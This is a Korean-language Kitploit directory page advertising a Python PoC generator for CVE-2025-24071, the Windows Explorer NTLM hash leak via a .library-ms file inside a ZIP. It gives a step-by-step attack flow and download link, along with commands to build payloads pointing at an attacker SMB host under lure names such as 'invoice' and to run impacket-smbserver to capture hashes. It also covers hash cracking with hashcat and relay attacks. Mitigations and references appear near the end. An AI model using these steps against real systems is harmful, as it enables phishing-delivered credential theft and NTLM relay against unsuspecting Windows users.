Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-24071 — 의존성 없는 Python PoC 생성기로, CVE-2025-24071에 대해 ZIP 내에 악성 .library-ms 파일을 생성하여 Windows Explorer NTLM 해시 노출을 유발합니다. | Kitploit
도구/GitHubGitHub/bardlaudian/cve-2025-24071
Phishing ToolsPassword AttacksVulnerability AnalysisExploitationLateral MovementInformation GatheringPenetration TestingRed Teaming
GitHubbardlaudian/cve-2025-24071

CVE-2025-24071

의존성 없는 Python PoC 생성기로, CVE-2025-24071에 대해 ZIP 내에 악성 .library-ms 파일을 생성하여 Windows Explorer NTLM 해시 노출을 유발합니다.

저장소 보기
12일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-24071 — .library-ms를 통한 Windows 파일 탐색기 스푸핑 / NTLM 해시 노출

Python CVE Platform

⚠️ 면책 조항: 이 도구는 교육 목적 및 승인된 침투 테스트 전용입니다. 본인이 소유하거나 테스트에 대한 명시적인 서면 허가를 받은 시스템에만 사용하십시오. 무단 사용은 불법입니다.


목차

  • 개요
  • 취약점 세부 정보
  • 작동 원리
  • 요구 사항
  • 설치
  • 사용법
  • 예제
  • 완화 방안
  • 크레딧
  • 참고 자료

개요

Windows 파일 탐색기는 특정 파일 형식이 폴더 보기에 나타나는 즉시, 더블클릭과 같은 사용자 상호작용 없이 자동으로 해당 파일을 구문 분석합니다. 영향을 받는 버전은 .library-ms 파일을 적절히 검증하지 못하며, 이 파일은 임의의 원격 SMB 경로를 가리키는 검색 커넥터를 정의할 수 있습니다.

탐색기가 악성 .library-ms 파일이 포함된 폴더를 렌더링할 때(예: ZIP/RAR 압축 파일을 압축 해제한 직후), "라이브러리" 위치를 확인하기 위해 공격자가 제어하는 UNC 경로에 조용히 연결을 시도합니다. 이 SMB 연결 시도에는 피해자의 NetNTLMv2 해시가 포함되며, 지정된 호스트에서 트래픽을 캡처하는 공격자(예: impacket-smbserver 또는 Responder 사용)는 이를 오프라인에서 크래킹하거나 릴레이를 시도할 수 있습니다.

이 저장소에는 이 취약점에 대한 공개 PoC 생성기의 최소한의 의존성 없는 재작성 버전이 포함되어 있습니다. Python 표준 라이브러리만 사용하여 악성 .library-ms 파일을 생성하고 ZIP으로 패키징합니다.


취약점 세부 정보


작동 원리

.library-ms 파일은 Windows 탐색기에 원격 또는 로컬 위치의 내용을 "라이브러리"로 표시하도록 지시하는 XML 문서입니다. <simpleLocation><url> 요소는 UNC 경로(\\<host>\<share>)를 가리킬 수 있습니다.

영향을 받는 버전에서 탐색기는 폴더가 표시되는 즉시 이 위치를 확인합니다. 폴더 보기에서 파일이 보이기만 하면 되며, 더블클릭이나 명시적인 작업은 필요하지 않습니다(예: 해당 파일이 포함된 압축 파일을 압축 해제한 직후).

공격 요구 사항

  1. 공격자는 피해자가 접근할 수 있는 호스트를 제어하거나(또는 같은 네트워크에 있음) SMB 리스너(impacket-smbserver, Responder 등)를 실행합니다.
  2. \\<attacker_ip>\<share>를 가리키는 악성 .library-ms 파일이 생성됩니다.
  3. 파일이 피해자에게 전달되며, 일반적으로 ZIP/RAR 압축 파일 내에 패키징됩니다(이 저장소는 해당 패키징 단계를 자동화합니다).
  4. 피해자가 압축 파일을 풀고 탐색기에서 폴더를 확인합니다. 추가 상호작용은 필요하지 않습니다.

익스플로잇 흐름

root@kitploit:~
1. 공격자 머신에서 SMB 리스너 시작
2. \\<attacker_ip>\<share>를 가리키는 .library-ms 파일 생성
3. ZIP 압축 파일로 패키징
4. 피해자에게 ZIP 전달 (업로드 기능, 이메일, 공유 등)
5. 피해자가 ZIP을 풀고 탐색기가 폴더를 렌더링
6. 탐색기가 UNC 경로 확인 -> SMB 인증 시도 -> NetNTLMv2 해시 캡처
7. 해시를 오프라인에서 크래킹 (hashcat -m 5600) 또는 릴레이

요구 사항

  • Python 3.8+ (표준 라이브러리만 사용 — os, sys, argparse, zipfile)

페이로드를 생성하는 데는 서드파티 의존성이 필요하지 않습니다. 해시를 캡처하려면 공격자 측에 Impacket(impacket-smbserver) 또는 Responder와 같은 SMB 리스너가 필요합니다.


설치

root@kitploit:~
git clone https://github.com/BardLaudian/CVE-2025-24071.git
cd CVE-2025-24071

사용법

root@kitploit:~
usage: cve_2025_24071.py [-h] [-n NAME] [-i IP] [-s SHARE] [-o OUTDIR] [-a]

options:
  -n NAME, --name NAME             Output base filename (no extension)
  -i IP, --ip IP                   Attacker IP to embed as the UNC path target
  -s SHARE, --share SHARE          Share name (default: shared)
  -o OUTDIR, --outdir OUTDIR       Output directory (default: current dir)
  -a, --affected-versions          Print the list of affected Windows versions and exit

예제

기본 사용법

root@kitploit:~
python3 cve_2025_24071.py -n invoice -i 10.10.14.5

이 명령은 \\10.10.14.5\shared를 가리키는 invoice.library-ms를 포함하는 invoice.zip을 생성합니다.

파일을 전달하기 전에 리스너 시작

root@kitploit:~
impacket-smbserver shared /tmp/smbshare -smb2support

사용자 지정 공유 이름 및 출력 디렉터리

root@kitploit:~
python3 cve_2025_24071.py -n report -i 10.10.14.5 -s data -o ./payloads

영향 받는 버전 목록

root@kitploit:~
python3 cve_2025_24071.py -a

완화 방안

  • Windows 버전에 맞는 2025년 3월 누적 보안 업데이트(또는 이후 버전)를 적용하십시오.
  • NTLM 해시가 외부 호스트로 유출되는 것을 방지하기 위해 네트워크 경계에서 아웃바운드 SMB(TCP 445)를 제한하십시오.
  • SMB 서명을 적용하고 가능한 경우 NTLM을 비활성화하고 Kerberos를 사용하십시오.
  • 최종 사용자 워크스테이션에 도달하기 전에 업로드/압축 해제된 압축 파일에서 .library-ms 및 유사한 자동 구문 분석 파일 형식을 검사하십시오.

크레딧

  • 취약점 발견 및 Microsoft에 보고: Microsoft (MSRC를 통해 크레딧 부여, 작성 시점에 원래 외부 보고자는 공개되지 않음)
  • 권고문 발행: Microsoft Security Response Center (MSRC)
  • 공개 PoC 생성기 개념 참조: ThemeHackers
  • 표준 라이브러리 재작성: Bardlaudian — ZIP/.library-ms 생성기의 의존성 없는 버전, 새로운 익스플로잇 기법 없음

참고 자료

  • MSRC — CVE-2025-24071 Security Update Guide
  • NVD — CVE-2025-24071
  • CVE.org Record — CVE-2025-24071
  • GitHub Advisory Database — GHSA-mppc-8qxh-4wjw
도구 다운로드
필드값
CVECVE-2025-24071
영향 받는 버전Windows 10 (1607–22H2), Windows 11 (22H2–24H2), Windows Server 2012 R2 – 2025
유형권한 없는 행위자에게 민감한 정보 노출 (CWE-200)
권한없음 (인증되지 않은 공격자, 피해자가 파일을 보거나 압축 해제해야 함)
영향NetNTLMv2 해시 노출 → 오프라인 크래킹 또는 NTLM 릴레이
CVSS7.5 높음 (GitHub Advisory Database 기준) / 6.5 (MSRC 기본 점수)
패치2025년 3월 패치 화요일 누적 업데이트